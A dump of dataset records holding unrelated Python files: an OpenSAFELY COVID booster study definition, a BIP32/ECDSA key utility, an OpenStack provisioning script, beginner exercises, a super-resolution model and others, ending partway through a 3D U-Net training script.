img = 'C:/PP/DCProject/DCP/TestPart/jf669qNTpM2H5G92EllzGrpy6xptDnfM.png' # получаем из цикла по заказу\n x = 5 * masshtab\n y = 5 * masshtab\n crete_one_pos(x, y, detail_title, position_code, position_quantity, order, img)\n\ncreate_pdf()\npdf.save()\n\n\n","sub_path":"TestPart/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522566978","text":"import os\nimport sqlite3\nimport subprocess\n\nconn = sqlite3.connect('skyhook.sqlite3')\nc = conn.cursor()\n\nfor dirname in os.listdir('/mnt/bdd/bdd-selected-videos/frames-half/'):\n\tnframes = len([fname for fname in os.listdir('/mnt/bdd/bdd-selected-videos/frames-half/' + dirname) if fname.endswith('.jpg')])\n\tc.execute('INSERT INTO clips (video_id, nframes, width, height) VALUES (4, ?, 640, 360)', (nframes,))\n\tsubprocess.call(['ln', '-s', '/mnt/bdd/bdd-selected-videos/frames-half/' + dirname, 'clips/4/{}'.format(c.lastrowid)])\n\nconn.commit()\nconn.close()\n","sub_path":"scripts/import_bdd.py","file_name":"import_bdd.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481280480","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 18 21:12:08 2016\r\n\r\n@author: Ariadni\r\n\"\"\"\r\n\r\ndef bookPages(pagesContent):\r\n\r\n#Input\r\n#pagesContent Number of pages of content (whole number).\r\n#Output\r\n#pagesBooklet Number of pages in booklet (whole number).\r\n pagesBooklet=pagesContent\r\n while pagesBooklet%4!=0:\r\n pagesBooklet+=1\r\n return pagesBooklet\r\n#print(bookPages(19))","sub_path":"ExamSolutions/bookPages.py","file_name":"bookPages.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329664431","text":"##############################################################################\n#\n# This script provides the formal specification of the study data\n# that will be extracted from\n# the OpenSAFELY database.\n#\n# STUDY PURPOSE: to perform regression discontinuity of 2022/23 \n# autumn booster COVID-19 vaccine, before and after 50+ became eligible\n# on October 15, 2022\n#\n# This study definition extracts counts of outcomes by week during the study period\n#\n##############################################################################\n\n\n# IMPORT STATEMENTS ----\n\n# Import code building blocks from cohort extractor package\nfrom cohortextractor import (\n StudyDefinition,\n patients,\n Measure,\n codelist,\n)\n\n# Import codelists from codelist.py (which pulls them from the codelist folder)\nfrom codelists import *\n\nCOHORT = \"output/cohort/cohort_final_sep_measures.csv\"\n\n# Specify study definition\nstudy = StudyDefinition(\n\n # Configure the expectations framework\n default_expectations = {\n \"date\": {\"earliest\": \"2020-12-08\", \"latest\": \"2023-02-01\"},\n \"rate\": \"uniform\",\n \"incidence\": 0.5,\n },\n \n # Set index date\n index_date = \"2022-09-03\",\n\n population=patients.which_exist_in_file(COHORT),\n\n ## Extract DOB, DOB and flu vax date from previously generated cohort\n # Date of birth month/year\n dob=patients.with_value_from_file(\n COHORT,\n returning=\"dob\",\n returning_type=\"date\",\n ),\n \n # Date of death\n dod=patients.with_value_from_file(\n COHORT,\n returning=\"dod\",\n returning_type=\"date\",\n ),\n\n # Flu vax\n flu_vax_date=patients.with_value_from_file(\n COHORT,\n returning=\"flu_vax_date\",\n returning_type=\"date\",\n ),\n \n boost_date=patients.with_value_from_file(\n COHORT,\n returning=\"boost_date\",\n returning_type=\"date\",\n ),\n\n ############################################################\n ## OUTCOMES\n ############################################################\n \n # All-cause death\n anydeath=patients.died_from_any_cause(\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # COVID death\n coviddeath=patients.with_these_codes_on_death_certificate(\n covid_codes,\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # COVID unplanned admission\n covidadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_these_diagnoses=covid_codes,\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ), \n \n # COVID emergency attendance \n covidemergency=patients.attended_emergency_care(\n between=[\"index_date\",\"index_date + 6 days\"], \n with_these_diagnoses = covid_emergency,\n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # COVID composite\n covidcomposite=patients.categorised_as(\n {\n 0: \"DEFAULT\",\n 1: \"\"\"\n coviddeath = 1 OR\n covidadmitted = 1 OR\n covidemergency = 1\n \"\"\",\n },\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # Respiratory death (underlying cause only)\n respdeath=patients.with_these_codes_on_death_certificate(\n resp_codes,\n match_only_underlying_cause=True,\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # Respiratory unplanned admission (primary diagnosis only)\n respadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_these_primary_diagnoses=resp_codes,\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # Respiratory composite\n respcomposite=patients.categorised_as(\n {\n 0: \"DEFAULT\",\n 1: \"\"\"\n respdeath = 1 OR\n respadmitted = 1\n \"\"\"\n },\n return_expectations = {\"incidence\": 0.4},\n ),\n \n # Unplanned hospital admission (all cause)\n anyadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_patient_classification = [\"1\"], # ordinary admissions only\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n)\n\n\n\n# --- DEFINE MEASURES ---\nmeasures = [\n Measure(\n id = \"anydeath\",\n numerator = \"anydeath\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"anyadmitted\",\n numerator = \"anyadmitted\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidadmitted\",\n numerator = \"covidadmitted\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidemergency\",\n numerator = \"covidemergency\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidcomposite\",\n numerator = \"covidcomposite\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"respcomposite\",\n numerator = \"respcomposite\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n]","sub_path":"analysis/study_definition_measures.py","file_name":"study_definition_measures.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163350722","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\nblock_freq = {}\n\ndef read_blktrace(file):\n f = open(file)\n for line in f:\n # print(line)\n line_element = line.split()\n if len(line_element) > 0 and line_element[0] == \"259,0\":\n # print(line_element)\n block_num= int(line_element[7])\n if block_num not in block_freq:\n block_freq[block_num] = 0\n block_freq[block_num] += 1\n f.close()\n block_lst = [[item[0], item[1]] for item in block_freq.items()]\n block_lst = sorted(block_lst, key=lambda kv: kv[1])\n block_lst.reverse()\n num = np.array(block_lst)\n return num\n\nif __name__ == \"__main__\":\n fs = \"ext4\"\n filename = \"{}_{}_sx-stackoverflow_3600\"\n block_freq = {}\n num1 = read_blktrace(filename.format(fs, \"memoryAndDisk\"))\n block_freq = {}\n num2 = read_blktrace(filename.format(fs, \"diskOnly\"))\n\n # max_access = max(num1[..., 1][0], num2[..., 1][0])\n max_block = max(num1.shape[0], num2.shape[0])\n\n if num1.shape[0] == max_block:\n _num1 = num1[..., 1]\n _num2 = np.concatenate((num2[..., 1], np.zeros(max_block - num2.shape[0])))\n else:\n _num1 = np.concatenate((num1[..., 1], np.zeros(max_block - num1.shape[0])))\n _num2 = num2[..., 1]\n\n # x = np.linspace(0, max_block, num=max_block)\n x = np.linspace(0, max_block, num=max_block)[:250]\n\n # plt.plot(x, _num1, label=\"memoryAndDisk\")\n # plt.plot(x, _num2, label=\"diskOnly\")\n plt.plot(x, _num1[:250], label=\"memoryAndDisk\")\n plt.plot(x, _num2[:250], label=\"diskOnly\")\n\n plt.xlabel(\"block\")\n plt.ylabel(\"access times\")\n\n plt.title(\"{} Frequency distribution\".format(fs))\n plt.legend()\n # plt.savefig('png/{}.png'.format(\"{} Frequency distribution\".format(fs)), dpi=1200)\n plt.savefig('png/{}_focus.png'.format(\"{} Frequency distribution\".format(fs)), dpi=1200)\n\n print(\"finished\")","sub_path":"hw3/python/block_each_fs.py","file_name":"block_each_fs.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19692474","text":"import codecs\nfrom hashlib import sha256\nfrom ecdsa import SigningKey, VerifyingKey, ellipticcurve\nfrom ecdsa.ellipticcurve import Point, CurveFp\nimport ecdsa\n\nfrom bip32utils import BIP32Key\n\nimport logging\n\ndecode_hex = codecs.getdecoder(\"hex_codec\")\nencode_hex = codecs.getencoder(\"hex_codec\")\n\n\nclass Bip32Keys:\n\n def __init__(self, init_params):\n if isinstance(init_params, str):\n self.init_from_entropy(init_params)\n elif isinstance(init_params, dict):\n if 'entropy' in init_params:\n self.init_from_entropy(init_params['entropy'])\n elif 'private_key' in init_params:\n self.init_from_private_key(init_params['private_key'])\n else:\n raise NotImplementedError()\n\n def init_from_entropy(self, entropy):\n entropy = entropy.encode()\n\n key = BIP32Key.fromEntropy(entropy, public=False)\n self.private_key = key.PrivateKey()\n self.public_key = key.PublicKey()\n\n self.uncompressed_public_key = decode_hex(Bip32Keys.to_uncompressed_public_key(\n self.get_public_key()\n ))[0]\n\n def init_from_private_key(self, private_key):\n sk = SigningKey.from_string(string=decode_hex(private_key)[0], curve=ecdsa.SECP256k1, hashfunc=sha256)\n vk = sk.get_verifying_key()\n\n self.private_key = sk.to_string()\n self.public_key = decode_hex(Bip32Keys.to_compressed_public_key(encode_hex(vk.to_string())[0].decode()))[0]\n self.uncompressed_public_key = b'\\x04' + vk.to_string()\n\n def get_public_key(self):\n return encode_hex(self.public_key)[0].decode()\n\n def get_private_key(self):\n return encode_hex(self.private_key)[0].decode()\n\n def get_uncompressed_public_key(self):\n return encode_hex(self.uncompressed_public_key)[0].decode()\n\n def sign_msg(self, message):\n return Bip32Keys.sign_message(message, self.get_private_key())\n\n def verify_msg(self, message, signature):\n return Bip32Keys.verify_message(message, signature, self.get_uncompressed_public_key())\n\n @staticmethod\n def to_uncompressed_public_key(public_key):\n if len(public_key) == 130:\n return public_key\n elif len(public_key) == 128:\n return '04' + public_key\n p_hex = 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F'\n p = int(p_hex, 16)\n\n x_hex = public_key[2:66]\n x = int(x_hex, 16)\n prefix = public_key[0:2]\n\n y_square = (pow(x, 3, p) + 7) % p\n y_square_square_root = pow(y_square, (p + 1) // 4, p)\n if (prefix == \"02\" and y_square_square_root & 1) or (prefix == \"03\" and not y_square_square_root & 1):\n y = (-y_square_square_root) % p\n else:\n y = y_square_square_root\n\n computed_y_hex = format(y, '064x')\n computed_uncompressed_key = \"04\" + x_hex + computed_y_hex\n\n return computed_uncompressed_key\n\n @staticmethod\n def to_compressed_public_key(public_key):\n if len(public_key) == 66:\n return public_key\n\n y_hex = public_key[64:]\n if int(y_hex, 16) & 1:\n prefix = '03'\n else:\n prefix = '02'\n\n if len(public_key) == 130:\n return prefix + public_key[2:66]\n elif len(public_key) == 128:\n return prefix + public_key[:64]\n\n @staticmethod\n def sign_message(message, private_key):\n priv_key = Bip32Keys._validate_private_key_for_signature(private_key)\n message = message.encode()\n sk = SigningKey.from_string(curve=ecdsa.SECP256k1, string=decode_hex(priv_key)[0], hashfunc=sha256)\n sig = sk.sign(message, sigencode=ecdsa.util.sigencode_der)\n return encode_hex(sig)[0].decode()\n\n @staticmethod\n def verify_message(message, signature, public_key):\n pub_key = Bip32Keys._validate_public_key_for_signature(public_key)\n sig = signature\n msg = message.encode()\n vk = VerifyingKey.from_string(string=decode_hex(pub_key)[0], curve=ecdsa.SECP256k1, hashfunc=sha256)\n\n if len(sig) == 128:\n vk.verify(decode_hex(sig)[0], msg, sigdecode=ecdsa.util.sigdecode_string)\n else:\n vk.verify(decode_hex(sig)[0], msg, sigdecode=ecdsa.util.sigdecode_der)\n\n return True\n\n @staticmethod\n def _validate_private_key_for_signature(private_key):\n if len(private_key) == 64:\n return private_key\n elif len(private_key) == 66:\n if private_key[0:2] == '80':\n return private_key[2:]\n elif private_key[-2:] == '01':\n return private_key[:-2]\n elif len(private_key) == 68:\n return private_key[2:-2]\n else:\n raise Exception('Bad private key length')\n\n @staticmethod\n def _validate_public_key_for_signature(public_key):\n if len(public_key) == 128:\n return public_key\n elif len(public_key) == 130:\n return public_key[2:]\n elif len(public_key) == 66:\n return Bip32Keys.to_uncompressed_public_key(public_key)[2:]\n else:\n raise Exception('Unsupported public key format')\n\n\n \"\"\"\n for asymetric encryption\n \"\"\"\n # Certicom secp256-k1\n _a = 0x0000000000000000000000000000000000000000000000000000000000000000\n _b = 0x0000000000000000000000000000000000000000000000000000000000000007\n _p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f\n _Gx = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798\n _Gy = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8\n _r = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141\n\n curve_secp256k1 = ecdsa.ellipticcurve.CurveFp(_p, _a, _b)\n generator_secp256k1 = ecdsa.ellipticcurve.Point(curve_secp256k1, _Gx, _Gy, _r)\n\n def get_shared_key(self, another_public_key):\n return Bip32Keys.generate_shared_key(self.get_private_key(), another_public_key)\n\n @staticmethod\n def generate_shared_key(private_key, public_key):\n public_key = Bip32Keys.to_uncompressed_public_key(public_key)\n private_key = int(private_key, 16)\n x = int(public_key[2:66], 16) # drop prefix\n y = int(public_key[-64:], 16)\n another_point = Point(Bip32Keys.curve_secp256k1, x, y)\n shared_point = another_point * private_key\n return str(hex(shared_point.x()))[2:] + str(hex(shared_point.y()))[2:]\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n keys = Bip32Keys({'entropy': '3123213213213123312c3kjifj3'})\n print('public key: ', keys.get_public_key())\n print('private key: ', keys.get_private_key())\n print('uncompressed public key: ', keys.get_uncompressed_public_key())\n sig = keys.sign_msg('hello world')\n print('signature: ', sig)\n print('verify signature: ', keys.verify_msg('hello world', sig))\n\n print('compressed: ', Bip32Keys.to_compressed_public_key('041ad7138370ef5e93fb243aff3373e2b92383818dfc20022841b655e0cd6c618cd578261c78e1adfe205c3ade8b81e1722d6058be9155eee55468fbb04b62040e'))\n\n keys2 = Bip32Keys({'entropy': 'fdjsofjioej9fsdfjdskfdsjkhfdsj'})\n print('shared key', keys2.get_shared_key(keys.get_public_key()))\n print('shared key', keys.get_shared_key(keys2.get_public_key()))\n print('shared key', Bip32Keys.generate_shared_key(keys.get_private_key(), keys2.get_public_key()))\n","sub_path":"parser/utils/bip32keys/bip32keys.py","file_name":"bip32keys.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559881825","text":"\nimport os\nfrom keystoneauth1 import loading\nfrom keystoneauth1 import session\nfrom keystoneclient.v3 import client as keystone_v3\nfrom cinderclient import client as cinder\nfrom novaclient import client as nova\nfrom glanceclient import client as glance\nfrom neutronclient.v2_0 import client as neutron\n\n\ndef authentification():\n #get keystone auth\n openstack_credentials = {}\n openstack_credentials['username'] = os.environ['OS_USERNAME']\n openstack_credentials['password'] = os.environ['OS_PASSWORD']\n openstack_credentials['project_id'] = os.environ['OS_TENANT_ID']\n openstack_credentials['auth_url'] = os.environ['OS_AUTH_URL']\n loader = loading.get_plugin_loader('password')\n auth = loader.load_from_options(**openstack_credentials)\n sess = session.Session(auth=auth)\n return sess\n\ndef createInstance(keystonToken,instanceNAme,regionName,sshKeyName,flavorName,imageName,ip):\n VERSION = \"2\"\n sess = keystonToken\n instance = {}\n instance['name'] = instanceNAme\n instance['key_name'] = sshKeyName\n #Find Image ID in glance\n glanceConnect = glance.Client(VERSION, session=sess,region_name=regionName)\n allImages = glanceConnect.images.list()\n for t in allImages:\n if t['name'] == imageName:\n imageId = t['id']\n instance['image'] = imageId\n\n #Find flavor ID in Nova\n novaConnect = nova.Client(VERSION, session=sess,region_name=regionName)\n for t in novaConnect.flavors.list():\n if t.name == flavorName:\n flavorId = t.id\n instance['flavor'] = flavorId\n\n #addFileUserData\n fileUserData = os.path.join(os.getcwd(),'userdata',instance['name'])\n if os.path.isfile(fileUserData):\n file = open(fileUserData).read()\n instance[\"userdata\"] = file.replace(\"{IP}\", ip)\n\n neutronConnect = neutron.Client(session=sess,region_name=regionName)\n network = []\n #Ext-Net\n extNetwork = neutronConnect.list_networks(name='Ext-Net')['networks'][0]['id']\n network.append({\"net-id\": extNetwork, \"v4-fixed-ip\": ''})\n #Public\n publicNetwork = neutronConnect.list_networks(name='public')['networks'][0]['id']\n network.append({\"net-id\": publicNetwork, \"v4-fixed-ip\": ''})\n #Management\n managementNetwork = neutronConnect.list_networks(name='management')['networks'][0]['id']\n network.append({\"net-id\": managementNetwork, \"v4-fixed-ip\": ip})\n\n instance['nics'] = network\n novaConnect.servers.create(**instance)\n\nif __name__ == \"__main__\":\n regionName = os.environ['OS_REGION_NAME']\n flavorName = \"c2-7\"\n imageName = \"Ubuntu 16.04\"\n sshKeyName = \"deploy\"\n toCreateInstance = [('deployer','192.168.0.10'),\n ('rabbit','192.168.0.11'),\n ('mysql','192.168.0.12'),\n ('keystone','192.168.0.13'),\n ('nova','192.168.0.14'),\n ('glance','192.168.0.15'),\n ('neutron','192.168.0.16'),\n ('horizon','192.168.0.17'),\n ('compute-1','192.168.0.18')]\n\n sess = authentification()\n for instance,ip in toCreateInstance:\n createInstance(sess,instance,regionName,sshKeyName,flavorName,imageName,ip)\n\n","sub_path":"bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166438556","text":"# 1\nimport math\npos = [0,0]\nwhile True:\n s = int(input(\"Enter Steps: \"))\n if not s:\n break\n movement = s.split(\" \")\n direction = movement[0]\n steps = int(movement[1])\n if direction==\"UP\":\n pos[0]+=steps\n elif direction==\"DOWN\":\n pos[0]-=steps\n elif direction==\"LEFT\":\n pos[1]-=steps\n elif direction==\"RIGHT\":\n pos[1]+=steps\n else:\n pass\nprint(round(math.sqrt(pos[1]**2+pos[0]**2)))\n\n# 2\ndef search(list, n):\n list = [1, 2, 3, 'jyo']\nn = input('enter input')\nif search(list, n):\n print(\"Found\")\nelse:\n print(\"Not Found\")\n\n# 3\nimport time\nt=time.localtime()\nh=t.tm_hour\nn = input('enter input')\nif h > 6 and h<18:\n print('It is day-time')\n\nelse:\n print('It is night-time')\n\n\n# 4\nfrom math import radians, sin, cos, acos\n\nprint(\"Input coordinates of two points:\")\nslat = radians(float(input(\"Starting latitude: \")))\nslon = radians(float(input(\"Ending longitude: \")))\nelat = radians(float(input(\"Starting latitude: \")))\nelon = radians(float(input(\"Ending longitude: \")))\n\ndist = 6371.01 * acos(sin(slat)*sin(elat) + cos(slat)*cos(elat)*cos(slon - elon))\nprint(\"The distance is %.2fkm.\" % dist)\n\n\n# 6\nlist = [x for x in range(2000,3200) if x%7==0 and x%5!=0]\nprint(list)\n\n# 7\ndef fact(n):\n if n==0:\n return 1\n return n*fact(n-1)\nresult = fact(8)\nprint(result)\n\n\n# 8\nimport math\nC= 50\nH = 30\nD = []\nresult =[]\nDv=input(\"enter the value of D\\n\")\nD=Dv.split(\",\")\nD = [int(i) for i in D]\ni=0\nl = len(D)\nwhile(i point\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n # feature channel downscale and upscale --> channel weight\n self.conv_du = nn.Sequential(\n nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n y = self.avg_pool(x)\n y = self.conv_du(y)\n return x * y\n\ndef fixed_padding(inputs, kernel_size, dilation):\n kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n padded_inputs = F.pad(inputs, (pad_beg, pad_end, pad_beg, pad_end))\n return padded_inputs\n\nclass SeparableConv2d(nn.Module):\n def __init__(self, inplanes, planes, kernel_size=3, stride=1, dilation=1, bias=False, BatchNorm=None):\n super(SeparableConv2d, self).__init__()\n\n self.conv1 = nn.Conv2d(inplanes, inplanes, kernel_size, stride, 0, dilation,\n groups=inplanes, bias=bias)\n #self.bn = BatchNorm(inplanes)\n self.pointwise = nn.Conv2d(inplanes, planes, 1, 1, 0, 1, 1, bias=bias)\n\n def forward(self, x):\n x = fixed_padding(x, self.conv1.kernel_size[0], dilation=self.conv1.dilation[0])\n x = self.conv1(x)\n #x = self.bn(x)\n x = self.pointwise(x)\n return x\n \nclass MEuler(nn.Module):\n def __init__(\n self, n_feat, kernel_size, reduction,\n bias=True, bn=False, act=nn.ReLU(True)):\n \n super(MEuler,self).__init__()\n res1_body = []\n for i in range(2):\n res1_body.append(SeparableConv2d(n_feat, n_feat, kernel_size,1, 1, bias,None))\n if bn: res1_body.append(nn.BatchNorm2d(n_feat))\n if i == 0: res1_body.append(act)\n #res1_body.append(CALayer(n_feat, reduction))\n \n res2_body = []\n for i in range(2):\n res2_body.append(SeparableConv2d(n_feat, n_feat, kernel_size,1, 1, bias,None))\n if bn: res2_body.append(nn.BatchNorm2d(n_feat))\n if i == 0: res2_body.append(act)\n #res2_body.append(CALayer(n_feat, reduction))\n \n self.res1 = nn.Sequential(*res1_body)\n self.res2 = nn.Sequential(*res2_body)\n self.scale = 0.5\n \n def forward(self,x):\n res_1 = self.res1(x)\n out = x + res_1\n res_2 = self.res2(out)\n out = out + self.scale * (res_1+res_2)\n return out\n '''\n def forward(self,x):\n res_1 = self.res1(x)\n x = x + res_1\n res_2 = self.res2(x)\n x = x + self.scale * (res_1+res_2)\n return x\n ''' \n\n## Residual Group (RG)\nclass ResidualGroup(nn.Module):\n def __init__(self, conv, n_feat, kernel_size, reduction, act, res_scale, n_resblocks):\n super(ResidualGroup, self).__init__()\n modules_body = []\n modules_body = [\n MEuler(\n n_feat, kernel_size, reduction, True, False, act=nn.ReLU(True)) \\\n for _ in range(n_resblocks)]\n modules_body.append(conv(n_feat, n_feat, kernel_size))\n self.body = nn.Sequential(*modules_body)\n\n def forward(self, x):\n res = self.body(x)\n res += x\n return res\n\n## Residual Channel Attention Network (RCAN)\nclass XYJ(nn.Module):\n def __init__(self, args, conv=common.default_conv):\n super(XYJ, self).__init__()\n \n n_resgroups = args.n_resgroups\n n_resblocks = args.n_resblocks\n n_feats = args.n_feats\n kernel_size = 3\n reduction = args.reduction \n scale = args.scale[0]\n act = nn.ReLU(True)\n \n # RGB mean for DIV2K\n rgb_mean = (0.4488, 0.4371, 0.4040)\n rgb_std = (1.0, 1.0, 1.0)\n self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)\n \n # define head module\n modules_head = [conv(args.n_colors, n_feats, kernel_size)]\n '''\n modules_head = [nn.Conv2d(3, 32, 3, padding=1, bias=False),nn.ReLU(True),\n nn.Conv2d(32, 64, 3, padding=1, bias=False),nn.ReLU(True),]\n '''\n # define body module\n modules_body = [\n ResidualGroup(\n conv, n_feats, kernel_size, reduction, act=act, res_scale=args.res_scale, n_resblocks=n_resblocks) \\\n for _ in range(n_resgroups)]\n\n modules_body.append(conv(n_feats, n_feats, kernel_size))\n\n # define tail module\n modules_tail = [\n common.Upsampler(conv, scale, n_feats, act=False),\n conv(n_feats, args.n_colors, kernel_size)]\n\n self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)\n\n self.head = nn.Sequential(*modules_head)\n self.body = nn.Sequential(*modules_body)\n self.tail = nn.Sequential(*modules_tail)\n\n def forward(self, x):\n x = self.sub_mean(x)\n x = self.head(x)\n\n res = self.body(x)\n res += x\n\n x = self.tail(res)\n x = self.add_mean(x)\n\n return x \n\n def load_state_dict(self, state_dict, strict=False):\n own_state = self.state_dict()\n for name, param in state_dict.items():\n if name in own_state:\n if isinstance(param, nn.Parameter):\n param = param.data\n try:\n own_state[name].copy_(param)\n except Exception:\n if name.find('tail') >= 0:\n print('Replace pre-trained upsampler to new one...')\n else:\n raise RuntimeError('While copying the parameter named {}, '\n 'whose dimensions in the model are {} and '\n 'whose dimensions in the checkpoint are {}.'\n .format(name, own_state[name].size(), param.size()))\n elif strict:\n if name.find('tail') == -1:\n raise KeyError('unexpected key \"{}\" in state_dict'\n .format(name))\n\n if strict:\n missing = set(own_state.keys()) - set(state_dict.keys())\n if len(missing) > 0:\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))","sub_path":"train/code/model/XYJ/MEular/xyj_MEular2.py","file_name":"xyj_MEular2.py","file_ext":"py","file_size_in_byte":6792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197624298","text":"from datetime import datetime\nimport os.path as osp\nimport argparse\n# Create a file name that can be reused without having to make a new string for every file\n# and avoid it creating a new name and not being capable to read from the older file\n\n\ndef create_filename(id):\n if id == \"ig\":\n timestr = datetime.now().strftime(\"%Y-%m-%d\")\n return timestr\n else:\n # Create a filename based on the curren date and time in YYYY-MM-DD - HH\n timestr = datetime.now().strftime(\"%Y-%m-%d--%H\")\n\n return timestr\n\n\n# Check the given input file to see whether in exists\ndef get_searchterms(scraper_name):\n list_of_terms = []\n # Check whether the searchterms file exitst, else abort the scraper\n if not osp.exists(f'../search_terms_{scraper_name}.txt'):\n print(\"Not found, exiting...\")\n exit(-1)\n else:\n input_file = open(f'../search_terms_{scraper_name}.txt', 'r')\n read_lines = input_file.readlines()\n\n for lines in read_lines:\n list_of_terms_dirty = lines.strip()\n list_of_terms.append(list_of_terms_dirty)\n\n return list_of_terms\n","sub_path":"scraper-main/CodeBase/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532282111","text":"try:\n from queue import Queue, Empty\nexcept:\n from Queue import Queue, Empty\nfrom subprocess import Popen, PIPE\nimport shlex, time, threading\nfrom debug import debug\n\nclass process_handler:\n \n def __init__(self, command, debug = True):\n self.stdout = Queue()\n bufferless_command = \"stdbuf -i0 -o0 -e0 %s\" % (command)\n self.process = Popen(shlex.split(bufferless_command), stdin=PIPE, stdout=PIPE, stderr=PIPE)\n self.enqueue_thread = threading.Thread(target = self.enqueue_stdout_on_thread)\n self.enqueue_thread.start()\n\n def enqueue_stdout_on_thread(self):\n while True:\n b = self.process.stdout.read(1)\n if b == '':\n break\n self.stdout.put(b)\n\n def read(self):\n try:\n b = self.stdout.get(False)\n if debug:\n debug(b)\n return b\n except:\n return ''\n\n #Asynchronous reading with 100ms timeout.\n def read_all(self, delay = 0.1):\n out = \"\"\n b = ''\n while True:\n while b != '':\n out += b\n b = self.read()\n time.sleep(delay)\n b = self.read()\n if b == '':\n return out\n\n def write(self, line):\n if debug:\n debug(line)\n self.process.stdin.write(line.encode())\n\n def write_line(self, line):\n self.write(line + \"\\n\")\n\n def query_line(self, line):\n self.write_line(line)\n return self.read_all()\n\n def kill(self):\n self.process.kill()\n","sub_path":"process_handler.py","file_name":"process_handler.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430957911","text":"import argparse\nimport os\nimport glob\nimport random\nimport string\n\nfrom unet3d.data import write_data_to_file, open_data_file\nfrom unet3d.generator import get_training_and_validation_generators\nfrom unet3d.model import isensee2017_model\nfrom unet3d.training import load_old_model, train_model\n\n\ndist_mod = None\nif \"DDL_OPTIONS\" in os.environ:\n import ddl\n dist_mod = ddl\n\nif \"USE_HOROVOD_3DUNET\" in os.environ:\n import tensorflow as tf\n from tensorflow.core.protobuf import rewriter_config_pb2\n from tensorflow.python.keras import backend as K\n import horovod.keras as hvd\n dist_mod = hvd\n # Initialize Horovod\n hvd.init()\n\n # Pin GPU to be used to process local rank (one GPU per process)\n print (\"*****Horovod local rank = \", hvd.local_rank(), \"*****\")\n config = tf.ConfigProto()\n # The below config is needed on non-PowerAI builds of TensorFlow.\n config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.SCHEDULING_HEURISTICS\n config.gpu_options.allow_growth = True\n config.gpu_options.visible_device_list = str(hvd.local_rank())\n K.set_session(tf.Session(config=config))\n\n\nFLAGS = None\ndef config_memory_optimizer():\n # Set config 